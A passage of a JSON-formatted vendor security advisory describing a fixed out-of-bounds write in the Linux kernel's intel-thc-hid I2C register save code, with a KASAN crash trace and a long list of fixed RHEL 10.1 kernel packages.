"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: intel-thc-hid: intel-thc: Fix incorrect pointer arithmetic in I2C regs save\n\nImproper use of secondary pointer (\u0026dev-\u003ei2c_subip_regs) caused\nkernel crash and out-of-bounds error:\n\n BUG: KASAN: slab-out-of-bounds in _regmap_bulk_read+0x449/0x510\n Write of size 4 at addr ffff888136005dc0 by task kworker/u33:5/5107\n\n CPU: 3 UID: 0 PID: 5107 Comm: kworker/u33:5 Not tainted 6.16.0+ #3 PREEMPT(voluntary)\n Workqueue: async async_run_entry_fn\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x76/0xa0\n print_report+0xd1/0x660\n ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n ? kasan_complete_mode_report_info+0x26/0x200\n kasan_report+0xe1/0x120\n ? _regmap_bulk_read+0x449/0x510\n ? _regmap_bulk_read+0x449/0x510\n __asan_report_store4_noabort+0x17/0x30\n _regmap_bulk_read+0x449/0x510\n ? __pfx__regmap_bulk_read+0x10/0x10\n regmap_bulk_read+0x270/0x3d0\n pio_complete+0x1ee/0x2c0 [intel_thc]\n ? __pfx_pio_complete+0x10/0x10 [intel_thc]\n ? __pfx_pio_wait+0x10/0x10 [intel_thc]\n ? regmap_update_bits_base+0x13b/0x1f0\n thc_i2c_subip_pio_read+0x117/0x270 [intel_thc]\n thc_i2c_subip_regs_save+0xc2/0x140 [intel_thc]\n ? __pfx_thc_i2c_subip_regs_save+0x10/0x10 [intel_thc]\n[...]\n The buggy address belongs to the object at ffff888136005d00\n which belongs to the cache kmalloc-rnd-12-192 of size 192\n The buggy address is located 0 bytes to the right of\n allocated 192-byte region [ffff888136005d00, ffff888136005dc0)\n\nReplaced with direct array indexing (\u0026dev-\u003ei2c_subip_regs[i]) to ensure\nsafe memory access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: HID: intel-thc-hid: intel-thc: Fix incorrect pointer arithmetic in I2C regs save",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
